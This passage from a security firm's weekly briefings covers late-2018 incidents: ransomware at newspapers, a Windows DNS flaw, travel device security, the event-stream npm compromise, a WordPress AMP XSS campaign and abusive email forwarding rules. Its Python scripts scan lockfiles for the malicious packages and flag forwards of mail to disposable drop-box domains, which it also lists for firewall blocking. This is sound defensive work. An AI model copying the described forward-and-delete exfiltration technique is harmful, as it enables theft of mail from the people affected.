A few days later, Tribune Publishing fell victim to a targeted malware attack that prevented or delayed the printing of several large newspapers across the United States. Tribune publishes several large newspapers, including the Baltimore Sun and the Chicago Tribune, and its Olympic printing plant in downtown Los Angeles also handles the West Coast distribution of the Wall Street Journal and the New York Times.

Impact
Two information technology failures at two different companies threatened the business continuity of many organizations nationwide.

First, a single telecom provider’s disruption rippled across business and public services, including some vital 911 emergency phone services. The outage continued for more than two days and, according to an internal summary obtained by reporter Brian Krebs, was caused by a single faulty network management card. FCC Chairman Ajit Pai acknowledged that the 911 service disruption will be subject to federal inquiry, saying, “I’ve directed the Public Safety and Homeland Security Bureau to immediately launch an investigation into the cause and impact of this outage.”

Second, a malware attack targeted newspapers in widely separated markets. Investigations are ongoing; the LA Times reports that the malware responsible was a variant of “Ryuk”, which the Department of Health and Human Services’ cybersecurity task force had specifically highlighted in an August advisory. Notably, the LA Times, itself a victim, is no longer a Tribune company, which raises questions about both monoculture vulnerability and network connectivity. Merging the networks of acquired companies, or running one parent firm with multiple separate entities, can leave many security gaps, and domain and forest trusts can leave paths open for malware to spread well beyond the initial point of compromise.

Recommendations
Because modern business is so heavily interconnected, the systems it relies on are increasingly interconnected as well. Too often these layers and branches merge and grow out of expedience, with limited review of the security risk they present. InGuardians recommends that organizations identify all of the layers in their business continuity plans. It is no longer enough to know who your providers are; you should also know who theirs are.

Review the network information from previous mergers and acquisitions for single points of failure. Look for secondary or backup network connections and verify that they are, in fact, separate (a “redundant” circuit that rides the same provider’s backbone is not). Review network permissions with both parent and partner organizations. Confirm which firewalls are in place and determine whether their rule sets are up to date and able to prevent the spread of malware from a “trusted” connection.

It is also important to remember that, when it comes to business continuity planning, especially for critical systems, legacy systems and processes are sometimes themselves a good fallback. In one case in Boston, people who were unable to call 911 to report a fire used a fire “call box” to get firefighters on scene instead; Boston Fire remarked that the call box system has been operating successfully since 1852. InGuardians reminds you to review your business continuity plans early in 2019, keeping in mind that not all business continuity failures are caused by software problems.

Additional Resources
“Communications outage disrupts 911 service in parts of the country” (CNN)
https://www.cnn.com/2018/12/28/us/centurylink-outage-911-calls/index.html 

“FCC launches probe of CenturyLink in wake of nationwide 911 outage” (NBC News)
https://www.nbcnews.com/news/us-news/fcc-launches-probe-centurylink-wake-nationwide-911-outage-n952681 

Brian Krebs’ disclosure of CenturyLink’s “Event Conclusion Summary” (Twitter)
https://twitter.com/briankrebs/status/1079135599309791235

“Malware attack disrupts delivery of L.A. Times and Tribune papers across the U.S.“  (LA Times)
https://www.latimes.com/local/lanow/la-me-ln-times-delivery-breakdown-20181229-story.html 

“Ransomware suspected in cyberattack that crippled major US newspapers“ (ZDNet)
https://www.zdnet.com/article/ransomware-suspected-in-cyberattack-that-crippled-major-us-newspapers/ 

“Identifying, understanding, and analyzing critical infrastructure interdependencies” (IEEE Control Systems, 2002)
https://www.researchgate.net/publication/3206740_Identifying_understanding_and_analyzing_critical_infrastructure_interdependencies

InGuardians Events & Resources
David Mayer, Senior Security Consultant, will be leading a SANS Institute mentor session of the “Network Penetration Testing and Ethical Hacking” class in Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019. Reserve your spot now!
https://www.sans.org/mentor/class/sec560-boca-raton-07feb2019-david-mayer

Enjoyed KringleCon? We did too! If you haven’t had the chance to check out InGuardians talks, you can do so here:
Mike Poor on PCAPs for fun and profit:
https://www.inguardians.com/2018/12/27/pcap-for-fun-and-profit/

Larry Pesce on SDR:
https://www.inguardians.com/2018/12/27/software-defined-radio-the-new-awesome/

Jay Beale on Kubernetes:
https://www.inguardians.com/2018/12/27/quick-intro-attacking-a-kubernetes-cluster/

For more events and future training schedule, please visit
https://www.inguardians.com/training/

12/18/2018 Critical Windows DNS Server Heap Overflow Vulnerability

Issue
Microsoft has released patches for a remote code execution (RCE) vulnerability in Windows DNS Server, a heap overflow tracked as CVE-2018-8626. Unfortunately, this critical issue has not been the subject of much discussion and has largely flown under the radar. Because DNS is critical in enterprise networks, both for the proper function of Active Directory and for access to internal and Internet resources, this issue should be addressed immediately. Additionally, Microsoft DNS is most often run on Domain Controllers (Active Directory-integrated zones), so a compromised DNS server is usually a compromised Domain Controller, with the sensitive contents of Active Directory at stake.

Impact
While there is no publicly available exploit code at the time of this writing, it is only a matter of time. Given the nature of this attack, in which only a specially crafted DNS request needs to be sent to a vulnerable server, the window before proof-of-concept code appears is expected to be short. Should exploit code become available, its impact could be disastrous in an unpatched environment.

If an attacker were to gain control of the Windows DNS servers servicing a corporate network, the problems are several-fold. A successful attacker could:

•    modify DNS records so that authentication attempts are redirected to a rogue Domain Controller, in order to harvest credentials;

•    corrupt DNS records to cause denial of service, producing complete communications failures for Active Directory and other applications;

•    use the compromised DNS server as a highly privileged pivot point, with a high likelihood of compromising the entire Active Directory infrastructure.

Recommendations
Due to the possible impact of a DNS server compromise, it is critical for organizations to get ahead of a public exploit code release. InGuardians recommends that organizations apply the appropriate patches as recommended by Microsoft immediately. Until every server is patched, confirm which Windows DNS servers accept queries from untrusted networks and restrict that exposure to what is actually required.

Additionally, given the criticality and impact of this specific flaw, it is a good time for organizations to review and revise their overall patching strategy and timelines. Many organizations take a rolling approach to patching critical systems in order to minimize downtime; in these cases, critical components of the infrastructure may be left unpatched for extended periods, often 3 months or more. Instead of relying purely on a fixed schedule, we recommend including human judgment in this process so that patching timelines can be adjusted to the real-world impact of a given flaw.

Additional Resources
Microsoft CVE-2018-8626 security Guidance:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8626

December patch Tuesday narrative:
https://www.theregister.co.uk/2018/12/12/december_patch_tuesday/

ZDI December patch Tuesday narrative:
https://www.thezdi.com/blog/2018/12/11/the-december-2018-security-update-review

InGuardians Events & Resources
InGuardians Director of ICS Security Justin Searle is busy teaching all over the world; here is the list of his upcoming classes:

ICS410: ICS/SCADA Security Essentials | Washington DC | Dec 11 – 18
https://www.sans.org/event/cyber-defense-initiative-2018/course/ics-scada-cyber-security-essentials

For more events and future training schedule, please visit https://www.inguardians.com/training/

12/12/2018 Data Security for International Travel

Issue
While traveling to the UK recently, the CEO of a small US company involved in legal action against Facebook was allegedly compelled to divulge information to the British Parliament, in violation of a US court order. [1]  The information had been obtained during the US case’s discovery phase. This started a discussion on the circumstances surrounding it. Could a Member of Parliament really order someone to turn over documents without going through the US courts? Why would the CEO take that information with him? What could he have done to protect the information?

While the truth of the story turned out to be different [2], the questions are still valid, especially when it comes to who can compel disclosure of data. Sometimes, rare and arcane options exist that even experienced legal minds don’t know about or fully understand. By the nature of their position, CEOs and other executives necessarily have access to sensitive information about strategic, operational, planning, and legal matters. This information is often carried with them on, or accessible through, their notebook computers and other electronic devices. Travel to foreign nations thus opens that information to new risks.

Even traveling to a “friendly” foreign nation means entering a new legal regime that may be entirely unfamiliar, with an entirely different set of rights and consequences. Countries that are geopolitically friendly may still have minor differences with one another, and one country might attempt to seize evidence to gain an advantage in negotiations. It is not just formal procedures to worry about: Evil Maid attacks, in which someone gains access to a hotel room to surreptitiously tamper with electronic devices, really do occur, with varying degrees of sophistication.[3]

Modern technologies provide enormous mobility benefits. Notebooks, tablets, and phones are smaller; storage technologies like solid state drives (SSDs) are light and fast; and virtual private networks (VPNs) allow connectivity to corporate networks from around the world. But these technologies can also add risk: the devices are so integrated into our lives that we are loath to leave them behind; SSDs work differently from traditional hard drives (wear levelling and over-provisioned blocks are not reachable by an ordinary overwrite), making complete erasure hard to verify; and some nations have strict laws around VPNs, ranging from registered use to outright bans. The desire to keep the familiar when in an unfamiliar place can drastically increase the risk involved.

Impact
Seizure of devices can have effects ranging from loss of data availability, to data theft via forensic recovery, to the addition of malicious code. While loss of control of sensitive data can be extremely serious, bringing back malicious code, especially code developed and installed by a nation-state, can be catastrophic not just for your company but for your partners, vendors, and customers. Foreign intelligence agencies often attempt to penetrate government systems through contractors. This kind of malware is often extremely difficult to identify and may persist for years before detection, with potentially enormous cleanup costs and possible loss of current and future business.

Recommendations
The number of factors going into modern travel concerns has become dizzying. Aside from the general concerns of securing data at rest and in motion, political and international factors weigh in and can change on a moment’s notice, and the technical considerations of evolving computing environments also play a significant role. Everything that follows is subject to company-specific risk analysis, which turns on many variables: your company’s presence in the destination country, who the traveler is meeting, recent domestic and international incidents, and even the traveler’s social media posts and interactions. The recommendations below are written for travel to high-risk countries and may not all be necessary for a trip to a lower-risk nation.

When traveling to a foreign country, InGuardians recommends leaving your normal devices at home. Bring devices used only for travel, and minimize their number, ideally to just a notebook and a phone. Be aware of the laws of, and the relationships between, the starting, layover, and destination countries: if you are under suspicion, the intermediate airport(s) can search you and your belongings in most cases. Bear in mind that countries can change course incredibly quickly; after a terrorist attack, international conflict, or political turmoil, many countries become far more aggressive in their scrutiny.

The notebook should carry the absolute minimum of required software, be fully patched (including firmware, drivers, and third-party programs), use whole-disk encryption, and probably carry additional lock-downs that are not used in normal deployments. The user should not be able to install software, and the notebook should not be joined to an Active Directory domain. All email and web activity should go through a strong VPN with multi-factor authentication and then either web or RDP access, only to the data expressly needed for the trip; no email client (including Outlook) should be installed locally, to avoid the temptation to set it up. Users should know how to verify a proper VPN connection, including validating certificates; don’t underestimate the value of paper for carrying the necessary validation information, since a printed certificate fingerprint cannot be altered by malware on the device. Users should connect only to trusted networks, which in many cases means only their phone’s hotspot (watch out for data costs; streaming Netflix is probably a bad idea).

For the phone, get a recent model that still receives manufacturer and carrier updates, and a new number for international travel. Give additional consideration to models that keep key material in a secure element or hardware-backed keystore, for resistance to password recovery attacks. Encrypt the phone and require a long password, disallowing numeric PINs. Put no personal data on it: it is just for Internet access and phone calls. Have IT create a new iTunes or Google identity for which the traveler does not have the password, to prevent installation of apps, and scrap the account after travel. Corporate email should be accessed through the phone’s browser, ideally over the same VPN the notebook uses; this means checking manually rather than relying on notifications.

No device should ever leave your side: take them to meetings, meals, and wherever else you go, and do not let them out of your sight (another reason to minimize the number of devices). Consider any seized or missing device compromised and avoid using it at all. In a worst-case scenario, you should be ready to destroy not just a drive but an entire notebook and all other devices if there is reasonable suspicion of compromise. At a minimum, if you plan to replace rather than destroy a device, the motherboard firmware should be re-flashed and reset using an image obtained and cryptographically verified before the trip. You must also be willing to walk away from the hardware and possibly accept refusal of entry to the country (which can itself have cascading effects on future entry to that and other nations).

Additional Resources
[1] Ryan Browne, “Facebook documents seized by UK parliament ahead of a crucial hearing,” CNBC, Nov 27, 2018, https://www.cnbc.com/2018/11/26/facebook-documents-seized-by-uk-parliament-ahead-of-a-crucial-hearing.html
[2] “Six4Three Exec Ordered to Surrender Laptop after Facebook Leak,” Fortune, Dec 1, 2018, http://fortune.com/2018/12/01/facebook-leak-six4three/
[3] Christopher Boyd, “Leaving Laptops in Hotel Rooms: A Bad Idea,” Malwarebytes Labs, Oct 28, 2015, revised Mar 30, 2016, https://blog.malwarebytes.com/cybercrime/2015/10/leaving-laptops-in-hotel-rooms-a-bad-idea/

InGuardians Events & Resources
We are happy to announce that David Mayer, Senior Security Consultant, will be leading a SANS Institute mentor session of the “Network Penetration Testing and Ethical Hacking” class in Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019. Reserve your spot now!
https://www.sans.org/mentor/class/sec560-boca-raton-07feb2019-david-mayer

Justin Searle, our Director of ICS Security, is in DC this week, teaching his ICS410: ICS/SCADA Security Essentials at SANS Cyber Defense Initiative:
https://www.sans.org/event/cyber-defense-initiative-2018/course/ics-scada-cyber-security-essentials 

Our CTO, Jay Beale, delivered a talk & demos last week on Kubernetes Attack and Defense. You can find the slides, including Youtube links to all demonstration videos and CTF walkthrough at:
https://inguardians.box.com/s/cud8itarxt2u0gh4rec23npvls56kdk1

12/4/2018 Node.js package compromised, Copay targeted

Issue
NPM, the package manager for Node.js, was serving the package “event-stream” with malicious code. The malicious code arrived on Oct. 5th in a new dependency, flatmap-stream, that event-stream 3.3.6 had begun pulling in, and it went unnoticed until Nov 20th. Event-stream is a dependency of many other non-malicious packages, but the malware specifically targeted the Copay bitcoin wallet application. It checked wallet balances and, if a balance met its threshold, harvested the account data and exfiltrated it along with the wallet’s private keys.

Impact
The impact of this attack is limited to the Copay application; however, it highlights the problems inherent in trusting dependencies, especially open source dependencies pulled in transitively. The trojaned package was downloaded almost 8 million times, but because the payload targeted a single application, the impact of the malicious code was limited.

Recommendations
InGuardians recommends that organizations identify whether they use event-stream in any Node.js application, specifically version 3.3.6 (and its dependency flatmap-stream 0.1.1, which carried the payload). If the affected version is found, InGuardians recommends reverting to version 3.3.4. Check lockfiles and the full dependency tree, not just direct dependencies, since event-stream is most often pulled in transitively by something else.
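The audit above is easy to get wrong if you only look at direct dependencies. The following Python, added here as an example and not part of the npm incident report or the event-stream project, walks a package-lock.json (both the lockfileVersion 1 nested layout and the v2/v3 “packages” map) and reports every path that pins event-stream 3.3.6 or flatmap-stream 0.1.1. The lockfile and the package names in it are constructed for the example.

```python
import json

# Known-bad versions from the npm incident report: event-stream 3.3.6 pulled in
# the malicious flatmap-stream 0.1.1.
BAD_PACKAGES = {
    "event-stream": {"3.3.6"},
    "flatmap-stream": {"0.1.1"},
}

# Constructed sample package-lock.json (lockfileVersion 1 layout) in which a
# harmless-looking top-level dependency transitively pins event-stream 3.3.6.
SAMPLE_LOCK = json.dumps({
    "name": "example-app", "version": "1.0.0", "lockfileVersion": 1,
    "dependencies": {
        "left-pad": {"version": "1.3.0"},
        "some-cli-tool": {
            "version": "2.1.0",
            "dependencies": {
                "event-stream": {
                    "version": "3.3.6",
                    "dependencies": {
                        "flatmap-stream": {"version": "0.1.1"}
                    },
                },
            },
        },
    },
})


def walk_lock_v1(deps, path=()):
    """Yield (path, name, version) for every entry in a v1 'dependencies' tree,
    descending into nested (deduplicated-away) dependencies."""
    for name, meta in sorted(deps.items()):
        here = path + (name,)
        yield here, name, meta.get("version", "")
        nested = meta.get("dependencies")
        if nested:
            yield from walk_lock_v1(nested, here)


def walk_lock_v2(packages):
    """Yield (path, name, version) for a lockfileVersion 2/3 'packages' map.
    Keys look like 'node_modules/a/node_modules/b'; the root entry has key ''.
    Splitting on 'node_modules/' keeps scoped names such as '@scope/pkg' intact."""
    for key, meta in sorted(packages.items()):
        if not key:
            continue
        parts = tuple(p.strip("/") for p in key.split("node_modules/") if p.strip("/"))
        yield parts, parts[-1], meta.get("version", "")


def find_bad_packages(lock_text):
    """Return [(dependency path, name, version)] for every known-bad pin."""
    lock = json.loads(lock_text)
    if "packages" in lock:
        entries = walk_lock_v2(lock["packages"])
    else:
        entries = walk_lock_v1(lock.get("dependencies", {}))
    hits = []
    for path, name, version in entries:
        if version in BAD_PACKAGES.get(name, ()):
            hits.append((" > ".join(path), name, version))
    return hits


if __name__ == "__main__":
    for path, name, version in find_bad_packages(SAMPLE_LOCK):
        print(f"{name}@{version} via {path}")
```

Point `find_bad_packages` at each repository’s real package-lock.json; `npm ls event-stream flatmap-stream` gives the same answer for one checkout, but the lockfile walk can be run across every repository in CI without installing anything.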

Additional Resources
Details about the event-stream incident
https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident

InGuardians Events & Resources
This Friday: Seattle folks, don’t miss out! Jay Beale will be speaking at HushCon, sharing his Kubernetes Kung Fu, on Dec 7 at 2PM. InGuardians will be sponsoring and attending the conference as well; come meet some of our most talented team members! Follow us on Twitter @InGuardians for PSAs about after-hours shenanigans.
http://hushcon.com/schedule.html

InGuardians Director of ICS Security Justin Searle is busy teaching all over the world; here is the list of his upcoming classes:

ICS410: ICS/SCADA Security Essentials | Stockholm, Sweden | Nov 26 – 30
https://www.sans.org/event/stockholm-2018/course/ics-scada-cyber-security-essentials

“Assessing and Exploiting Control Systems and IoT” | London, UK| Dec 3-6
https://www.blackhat.com/eu-18/training/schedule/index.html#assessing-and-exploiting-control-systems-and-iot-11924

ICS410: ICS/SCADA Security Essentials | Washington DC | Dec 11 – 18
https://www.sans.org/event/cyber-defense-initiative-2018/course/ics-scada-cyber-security-essentials

For more events and future training schedule, please visit https://www.inguardians.com/training/

11/27/2018 WordPress AMP Plugin Under Active Attack: Stored Cross-Site Scripting Leading to Remote Code Execution
Issue
Attackers have begun to exploit a privilege escalation vulnerability in the WordPress plugin that renders Accelerated Mobile Pages (AMP) versions of a WordPress site. The vulnerability permits any registered user to plant JavaScript on any WordPress site that uses the AMP plugin, because the plugin’s AJAX handlers did not properly check the caller’s privileges. On many WordPress sites, users can register without approval in order to comment on posts, and one of these low-privilege users can place JavaScript on the site through the plugin’s AJAX functions. When an administrator later visits a page carrying that JavaScript, it runs in the administrator’s session and the attacker gains complete control of the WordPress site, including remote code execution.

Impact
There are over 100,000 active installations of the WordPress AMP plugin. An active campaign is targeting these sites, granting remote code execution to its operators and activating a vulnerable WooCommerce plugin, which complicates matters for site owners who upgrade their AMP plugin but don’t realize they also need to upgrade or deactivate the newly activated WooCommerce plugin. While it is not yet known what the attackers plan to do with the WordPress servers they are compromising, those machines will likely be monetized through some combination of ransomware, crypto-mining, and the items in Brian Krebs’ article, “The Scrap Value of a Hacked PC.”

Recommendations
InGuardians recommends that organizations determine whether they host WordPress sites, then check those sites for the AMP plugin as well as the WooCommerce plugin. Staff should confirm that the installed AMP plugin is not vulnerable by verifying that its version is 0.9.97.20 or later. Because the attack runs in an administrator’s browser session, also review each site’s user list for unexpected administrator accounts and its plugin list for plugins nobody installed or activated; either is a sign the site was already hit and patching alone will not evict the attacker.

InGuardians also recommends that organizations configure WordPress’ automatic update feature, to ensure that plugins spend as little time vulnerable as possible.

Whenever possible, InGuardians recommends that site owners use WordPress only to author content on a private site that isn’t publicly reachable, publishing a static version of that content on their public web site.  The WordPress plugin “Simply Static” can automate this process.

Finally, InGuardians recommends that organizations review the WordPress Hardening Guide, cited in the Additional Resources below.

Additional Resources
“XSS Injection Campaign Exploits WordPress AMP Plugin” (Wordfence Blog)
https://www.wordfence.com/blog/2018/11/xss-injection-campaign-exploits-wordpress-amp-plugin/

“Active XSS Attacks Targeting Amp for WP WordPress Plugin” (BleepingComputer)
https://www.bleepingcomputer.com/news/security/active-xss-attacks-targeting-amp-for-wp-wordpress-plugin/

“Simply Static [Wordpress plugin]” (Code of Conduct, LLC)
https://wordpress.org/plugins/simply-static/

“Wordpress Hardening Guide” (WordPress.org)
https://codex.wordpress.org/Hardening_WordPress

“The Scrap Value of a Hacked PC” (Krebs on Security)
https://krebsonsecurity.com/2012/10/the-scrap-value-of-a-hacked-pc-revisited/

InGuardians Events & Resources
Seattle folks, don’t miss out! Jay Beale will be speaking at HushCon, sharing his Kubernetes Kung Fu, on Dec 7 at 2PM. InGuardians will be sponsoring and attending the conference as well; come meet some of our most talented team members! Follow us on Twitter @InGuardians for PSAs about after-hours shenanigans.
http://hushcon.com/schedule.html

InGuardians Director of ICS Security Justin Searle is busy teaching all over the world; here is the list of his upcoming classes:

ICS410: ICS/SCADA Security Essentials | Stockholm, Sweden | Nov 26 – 30
https://www.sans.org/event/stockholm-2018/course/ics-scada-cyber-security-essentials

“Assessing and Exploiting Control Systems and IoT” | London, UK| Dec 3-6
https://www.blackhat.com/eu-18/training/schedule/index.html#assessing-and-exploiting-control-systems-and-iot-11924

ICS410: ICS/SCADA Security Essentials | Washington DC | Dec 11 – 18
https://www.sans.org/event/cyber-defense-initiative-2018/course/ics-scada-cyber-security-essentials

For more events and future training schedule, please visit https://www.inguardians.com/training/

11/20/2018 Attackers use email forwarding and deletion rules to steal information and hide their tracks

Issue
A common, yet old, technique attackers use once they have gained access to a victim’s email account is to modify the account’s forwarding settings. Messages are forwarded to a temporary email drop-box for remote, hard-to-trace retrieval. Users rarely check their forwarding settings to see whether they have been edited, so the breach can remain undetected for a long time.

Impact
One sign of such a breach is fewer emails, or none at all, arriving in an account where you expect traffic: a forward-and-delete rule may be in place.
If an attacker has access to your email account, or to the entire email administration account, they may instead forward a copy of all future emails to another account and NOT delete them. In this scenario you leak all intellectual property, client information, and other sensitive data without any obvious indication to a normal user. We have seen this in the wild targeting employee payroll and benefits sites, VPN servers, other corporate assets, and university accounts. Attackers can also target employees’ accounts on popular online retailers to monetize their access more immediately, and they may gain long-term business intelligence and intellectual property, receiving copies of every attachment as well as the plain emails. Organizations involved in research or development are prime targets of such redirection attacks.

Recommendations
Check your email account configuration for unexpected forwarding or delete-upon-receipt rules, and look at mailbox-level forwarding settings, not just inbox rules. Most mail platforms can alert you when your account configuration changes; enable those alerts. Look for forwards to odd domains, such as “nada<dot>email” (a real example); there are many others, and a search for “nada email” will show you that service and its peers. Those names and their associated IP addresses (IPv4 and IPv6) belong in your outbound firewall filters: there is no reason your company should be connecting to such places. Deny organizational traffic to them and make sure the firewall raises an alert, because mail trying to go there is proof of unauthorized alteration of email settings, whether by an external attacker or an insider. Where your mail platform supports it, also disable automatic forwarding to external domains at the organization level, so that a rule created in a compromised account cannot deliver anything outside the organization in the first place.
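To make the configuration review above repeatable, the following Python is an added example (not from the briefing or any of the cited posts) that audits an export of inbox rules and of mailbox-level forwarding settings and flags external or drop-box destinations, forward-and-delete combinations, and the near-empty rule names attackers use to stay inconspicuous. The CSV columns mimic what Exchange’s Get-InboxRule and Get-Mailbox cmdlets export, but the rows, mailboxes, and addresses are constructed; example.com as the internal domain and the drop-box domain list are assumptions to replace with your own.

```python
import csv
import io
import re

INTERNAL_DOMAINS = {"example.com"}              # assumption: the org's own domains
DROPBOX_DOMAINS = {"nada.email", "getnada.com"}  # from the briefing; extend as needed

# Constructed sample: shape of a Get-InboxRule export. Recipients appear as
# "[SMTP:address]" the way Exchange renders them.
SAMPLE_RULES_CSV = """\
Mailbox,Name,Enabled,ForwardTo,ForwardAsAttachmentTo,RedirectTo,DeleteMessage,MoveToFolder
ceo@example.com,Invoices,True,,,,False,Finance
ceo@example.com,.,True,,,"[SMTP:x9f2k@nada.email]",True,
hr@example.com,Payroll copy,True,"[SMTP:payroll-archive@example.com]",,,False,
eng@example.com,Backup,True,,"[SMTP:eng.backup@protonmail.com]",,False,
"""

# Constructed sample: shape of a Get-Mailbox export of mailbox-level forwarding.
SAMPLE_MAILBOX_CSV = """\
PrimarySmtpAddress,ForwardingSmtpAddress,DeliverToMailboxAndForward
ceo@example.com,,False
research@example.com,smtp:drop.7721@getnada.com,True
"""

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def extract_addresses(field):
    """Pull every SMTP address out of an export field, whatever its decoration."""
    return [a.lower() for a in EMAIL_RE.findall(field or "")]


def classify_target(addr):
    """'internal', 'dropbox' (known disposable-mail provider) or 'external'."""
    domain = addr.rsplit("@", 1)[-1]
    if domain in DROPBOX_DOMAINS:
        return "dropbox"
    if domain in INTERNAL_DOMAINS or domain.endswith(tuple("." + d for d in INTERNAL_DOMAINS)):
        return "internal"
    return "external"


def audit_inbox_rules(csv_text):
    """Return [(mailbox, rule name, [reasons])] for every enabled rule worth a look."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row.get("Enabled", "True").strip().lower() != "true":
            continue
        targets = []
        for col in ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo"):
            targets += extract_addresses(row.get(col))
        reasons = []
        for target in targets:
            kind = classify_target(target)
            if kind != "internal":
                reasons.append(f"{kind} target {target}")
        # Forward plus delete is the pattern that empties the victim's inbox.
        if targets and row.get("DeleteMessage", "").strip().lower() == "true":
            reasons.append("forward-and-delete")
        name = row.get("Name", "")
        if not name.strip(". "):  # names like "." or "..." are a common attacker trick
            reasons.append("suspicious rule name")
        if reasons:
            findings.append((row["Mailbox"], name, reasons))
    return findings


def audit_mailbox_forwarding(csv_text):
    """Return [(mailbox, description)] for mailbox-level forwards that leave the org."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        for target in extract_addresses(row.get("ForwardingSmtpAddress")):
            kind = classify_target(target)
            if kind == "internal":
                continue
            keeps_copy = row.get("DeliverToMailboxAndForward", "").strip().lower() == "true"
            mode = " (copy, user still sees mail)" if keeps_copy else " (redirect, user sees nothing)"
            findings.append((row["PrimarySmtpAddress"], f"{kind} mailbox forward {target}" + mode))
    return findings


if __name__ == "__main__":
    for mailbox, name, reasons in audit_inbox_rules(SAMPLE_RULES_CSV):
        print(f"{mailbox}: rule {name!r}: {', '.join(reasons)}")
    for mailbox, desc in audit_mailbox_forwarding(SAMPLE_MAILBOX_CSV):
        print(f"{mailbox}: {desc}")
```

Run it against a real export on a schedule and diff the findings between runs; a rule that appears overnight on an executive’s mailbox is the event you want paged on, not merely logged.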

Additional Resources
“PowerShell and Malicious O365 Email Rules“ (Crypsis Blog)
https://www.crypsisgroup.com/blog/powershell-malicious-o365-email-rules/

“Found a forwarding rule in CEO’s account. Need advice.” (Spiceworks User Forum)
https://community.spiceworks.com/topic/2099649-found-a-forwarding-rule-in-ceo-s-account-need-advice

“Don’t be a Whale – How To Detect the Business Email Compromise (BEC) Scam” (Tripwire)
https://www.tripwire.com/state-of-security/featured/how-detect-business-email-compromise-bec-scam/

“When Phishing Succeeds: The Alternate Inbox Method” (Avanan Blog)
https://www.avanan.com/resources/phishing-alternate-inbox

GetNada – an example of a simple external email dropbox
https://getnada.com

InGuardians Events & Resources
Jarrod Frates, InGuardians Senior Security Analyst returns to Brakeing Down Security podcast to continue his discussion about all things pentest. If your organization is engaging in a pentest, give this a listen.
Part 1: http://brakeingsecurity.com/2016-029-jarrod-frates-steps-when-scheduling-a-pentest-and-the-questions-you-forgot-to-ask
Part 2: http://brakeingsecurity.com/2018-040-jarrod-frates-discusses-pentest-processes

Seattle folks, don’t miss out! Jay Beale will be speaking at HushCon sharing his Kubernetes Kung Fu on Dec 7 at 2PM. InGuardians will be sponsoring and attending the conference as well — come meet some of our most talented team members! Follow us on Twitter @InGuardians for PSA about after-hours shenanigans.
http://hushcon.com/schedule.html

InGuardians Director of ICS Security Justin Searle is busy teaching all over the world, here is the list of his upcoming classes:
ICS410: ICS/SCADA Security Essentials | Stockholm, Sweden | Nov 26 – 30
https://www.sans.org/event/stockholm-2018/course/ics-scada-cyber-security-essentials

“Assessing and Exploiting Control Systems and IoT” | London, UK| Dec 3-6
https://www.blackhat.com/eu-18/training/schedule/index.html#assessing-and-exploiting-control-systems-and-iot-11924

ICS410: ICS/SCADA Security Essentials | Washington DC | Dec 11 – 18
https://www.sans.org/event/cyber-defense-initiative-2018/course/ics-scada-cyber-security-essentials

For more events and future training schedule, please visit https://www.inguardians.com/training/

11/14/2018 Tomorrow’s cybersecurity threat

Issue

Over the weeks we have discussed breaking news about security flaws and exploits. Those have all been after a breach or attack was discovered. Tomorrow’s exploits will be both evolutionary and revolutionary.
We will continue to see re-use of old concepts like SQL injection, bad error trapping, or flaws in embedded application code. We have seen those all for years, and they remain in the top vulnerabilities on every list. Two weeks ago researchers discovered a way to modify things like YouTube video links embedded in Word documents so that they run malware without triggering a User Account Control window. Just a month ago, Fancy Bear malware was found in the wild capable of “patching” and tampering with firmware in targeted attacks.

Impact
InGuardians recommends you take a step back and consider your internal training and job announcement processes. Many organizations aim to hire people who already know Application X, or announce openings for people who know “Y”. ANY particular program in use today WILL be superseded, and new devices appear on our networks faster than we realize they have been deployed. Dr. Weber at the Center for Long-Term Cybersecurity, UC Berkeley, uses the rapid growth of internet-connected locks as an example of how our concepts and policies are not keeping up. “The notion that there’s this thing called “cybersecurity” that’s distinct from this other thing called “security” — that’s an idea that is disappearing,” Weber said.

Recommendations
InGuardians recommends considering security as the broader guiding concept. Too often “cyber” is kept separate, inside an IT department. Experience reveals that company risks often start in Sales or Marketing departments, or with phishing attacks arriving by email. It is common to be able to pivot from a user machine to discovering and then penetrating Domain Controllers.

Re-examine network architecture to avoid the risk of an attacker simply walking from a user machine back to controllers and servers. Segmentation is still a useful strategy even in an era of externally web-hosted services.

Many companies like to hire experienced cyber security staff, but where do people get experience? Consider both internal training and partnering with academia for the practical skills really needed. There is now and will be for a long time a major shortage of effective security practitioners. Since that suggests difficulty in hiring them, try training your own. As Weber says, it is also important to look at people already skilled in such things as accounting or healthcare. REAL cybersecurity is a multidisciplinary and context sensitive effort.

Additional Resources
The Ten Most Critical Web Application Security Risks
https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf

Unpatched MS Word Flaw Could Allow Hackers to Infect Your Computer
https://thehackernews.com/2018/10/microsoft-office-online-video.html

Tomorrow’s cyber threats demand a new kind of cybersecurity workforce
https://qz.com/1342324/tomorrows-cyber-threats-demand-a-new-kind-of-cybersecurity-workforce/

Global Cybersecurity Workforce Shortage to Reach 1.8 Million as Threats Loom Larger and Stakes Rise Higher
https://www.isc2.org/News-and-Events/Press-Room/Posts/2017/06/07/2017-06-07-Workforce-Shortage

The Damaging Effects of IP Theft
https://cybersecurity.berkeley.edu/blog/damaging-effects-ip-theft/

Fancy Bear LoJax campaign reveals first documented use of UEFI rootkit in the wild
https://www.zdnet.com/article/fancy-bear-lojax-campaign-reveals-first-documented-use-of-uefi-rootkit-in-the-wild/

The Center for Long-Term Cybersecurity, UC Berkeley
https://cltc.berkeley.edu/

InGuardians Resources & Events
Seattle folks, don’t miss out! Jay Beale will be speaking at HushCon sharing his Kubernetes Kung Fu on Dec 7 at 2PM. InGuardians will be sponsoring and attending the conference as well — come meet some of our most talented team members and say hi!

http://hushcon.com/schedule.html

We are happy to announce that David Mayer, Senior Security Consultant, will be leading a SANS Institute mentor session on the “Network Penetration Testing and Ethical Hacking” class in Boca Raton, FL, Thu Feb 7 – Fri Feb 22, 2019. Reserve your spot now!

https://www.sans.org/mentor/class/sec560-boca-raton-07feb2019-david-mayer

11/6/2018 Zero-day Denial of Service flaw in Cisco ASA and FTD appliances

Issue
